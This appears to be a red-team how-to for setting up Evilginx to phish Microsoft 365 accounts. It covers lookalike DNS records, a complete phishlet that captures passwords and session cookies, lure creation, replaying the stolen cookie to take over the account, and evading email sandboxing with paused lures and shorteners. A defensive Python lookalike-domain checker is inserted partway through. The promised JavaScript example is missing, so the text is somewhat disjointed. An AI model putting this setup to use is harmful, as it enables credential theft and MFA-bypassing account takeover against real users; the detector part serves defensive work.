Steps
Create a Server
- The easiest option is a Kali Linux AWS EC2 instance or a DigitalOcean Droplet. Ensure port 443 is open on this host. If we know which IP or IP range our target will visit from, we can lock this down further with firewall rules restricting access to the specified subnets.
Register Domain
- Easy domain registration through AWS Route53. Alternatively, we can register through GoDaddy, Crazy Domains or any other reputable provider.
- Ensure the DNS records are correct. For example, if we register the domain attacker.com and we are proxying the Microsoft login, we might create the following records:

  Name                                Type  Value
  login.microsoftonline.attacker.com  A     <servers_ipv4>
  www.microsoftonline.attacker.com    A     <servers_ipv4>
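A defender-side check for the lookalike hostnames these records create, added here as an example and not part of the original page: it flags URLs whose host carries one of the proxied Microsoft hostnames, minus its TLD, under a different registrable domain (login.microsoftonline.attacker.com). The legitimate hostnames are the ones the phishlet proxies, the sample URLs are constructed, attacker.com is the page's placeholder, and the "registrable domain is the last two labels" rule is a simplifying assumption.

```python
from urllib.parse import urlsplit

# Legitimate hostnames the phishlet on this page proxies (its proxy_hosts entries)
LEGIT_HOSTS = ("login.microsoftonline.com", "www.office.com", "login.microsoft.com")


def registrable(labels):
    """Registrable domain of a label list.

    Assumption: the registrable domain is the last two labels, which holds for
    the .com hosts here; a production version would consult the Public Suffix List.
    """
    return ".".join(labels[-2:])


LEGIT_REGISTRABLE = {registrable(h.split(".")) for h in LEGIT_HOSTS}


def impersonated_host(host):
    """Return the legitimate hostname that `host` imitates, or None.

    Evilginx serves <phish_sub>.<phish_domain>; with the phish_domain
    microsoftonline.attacker.com used on this page, the victim is sent to
    login.microsoftonline.attacker.com: the genuine hostname with its TLD
    replaced by an attacker-controlled registrable domain. That is the
    pattern matched here.
    """
    labels = host.lower().rstrip(".").split(".")
    if registrable(labels) in LEGIT_REGISTRABLE:
        return None  # the real site, or a true subdomain of it
    for legit in LEGIT_HOSTS:
        prefix = legit.split(".")[:-1]  # e.g. ['login', 'microsoftonline']
        if len(labels) > len(prefix) and labels[: len(prefix)] == prefix:
            return legit
    return None


def scan_urls(urls):
    """Map each URL whose host imitates a legitimate host to that host."""
    findings = {}
    for url in urls:
        host = urlsplit(url).hostname
        if host:
            target = impersonated_host(host)
            if target:
                findings[url] = target
    return findings


# Constructed sample links, as they might appear in a mail gateway or proxy log
SAMPLE_URLS = [
    "https://login.microsoftonline.com/common/oauth2/authorize",
    "https://login.microsoftonline.attacker.com/abc123",
    "https://www.office.attacker.com/",
    "https://login.microsoftonline.com.attacker.com/",
    "https://sts.contoso.com/adfs/ls/",
]

if __name__ == "__main__":
    for url, target in scan_urls(SAMPLE_URLS).items():
        print(f"{url} imitates {target}")
```

The check deliberately passes anything under the legitimate registrable domains first, so Microsoft's own subdomains are never flagged, and then looks for the brand hostname's leading labels sitting above a foreign registrable domain.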
EvilGinx Setup
- Install EvilGinx (with apt in kali)
sudo apt update
sudo apt install -y evilginx2
- Create our Microsoft phishlet
~/.evilginx/phishlets/microsoft365.yaml (https://github.com/BakkerJan/evilginx3/blob/main/microsoft365.yaml):
name: 'Microsoft 365'
author: 'Jan Bakker'
min_ver: '3.1.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: true}
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
    type: 'cookie'
credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password|accesspass)'
    search: '(.*)'
    type: 'post'
  custom:
    - key: 'mfaAuthMethod'
      search: '(.*)'
      type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'
- This may need modification to keep up to date with the latest techniques and the Microsoft OAuth flow.
Configure and Start EvilGinx Server
To prevent the server process from terminating if the SSH connection drops, we run it inside tmux, and we use script to log our activity:
# Launch a new tmux session
tmux new -s evilginx
# Detach from tmux session when needed
ctrl+b, d
# Rejoin tmux session
tmux attach -t evilginx
# Start session logging
script -a ~/.evilginx/session.log
# Stop logging when done
exit
Within the tmux session, with session logging running, we start and configure the server:
# Start server, referencing the folder containing our phishlets
evilginx2 -p ~/.evilginx/phishlets/
# Link domain
config domain microsoftonline.attacker.com
# Link IP
config ipv4 external <servers_public_ipv4>
# Create a redirect URL for blacklisted visitors (source IPs in ~/.evilginx/blacklist.txt)
config unauth_url https://login.microsoftonline.com
# List available phishlets
phishlets # This should return one phishlet called microsoft365, based on our yaml file name
# Link the hostname to the phishlet
phishlets hostname microsoft365 microsoftonline.attacker.com
# Enable the phishlet (this obtains certificates for our phishing subdomains and starts hosting the site)
phishlets enable microsoft365
Set up our phishing links
Evilginx uses lures as individual phishing links. They take the format login.microsoftonline.attacker.com/<GUI>. We should create an individual lure for each target so we can keep track of which target has clicked their link.
# Create Lure for microsoft365 phishlet
lures create microsoft365
# List lures
lures
# Get a URL for a lure from the list
lures get-url 0
Receiving a session token
- If a visitor clicks on a link, it starts a session in which their activity is logged (username and password entered, MFA completed, session token captured). This appears in the logged output but can also be reviewed with:
# View sessions list
sessions
# View captured data for specified session
sessions <id>
- Once you have a valid session token, you can visit login.microsoftonline.com, load the captured JSON into a cookie editor and refresh. You should be redirected to M365 signed in as the target.
- From there, you can reset their password and MFA to persist on the account, or continue stealthily to enumerate the M365 environment.
- If resetting MFA or the password, it is best to do so outside of business hours (for example Friday night), as this will quickly be caught and remediation efforts commenced.
OPSEC
Most email providers perform link URL inspection and sandboxing (for example Microsoft Safe Links). We can mitigate this with several strategies:
- Pause the lure when sending the phishing link. While a lure is paused, all requests to the lure URL, even legitimate ones, are redirected to the unauth_url, so the email sandbox only sees a redirect:
# Pause specified lures for 10 minutes (can specify days hours minutes and seconds like 1d2h13m30s)
lures pause <id> 10m
# Unpause lure after you are satisfied the sandbox checks are completed
lures unpause <id>
- Use link obfuscation techniques. For example:
- We can use URL shorteners (owo.vc is a good one that doesn’t require registration and doesn’t perform any sandboxing itself)
- Set up an intermediary server that redirects to the phishing server only when certain conditions are met. Example JavaScript to do this can be:
Practical Example
The example landing page uses anti-sandbox techniques: it detects headless browsers and waits for mouse or touch movement. It takes the lure URL’s fragment (#abc123) and waits for the user to move their mouse over the page, confirming human interaction, before redirecting to the actual URL. The JavaScript can be obfuscated further so that automated tools cannot read the malicious link (currently it uses Base64).
Note: This page should be hosted on a different URL to the malicious link URL.
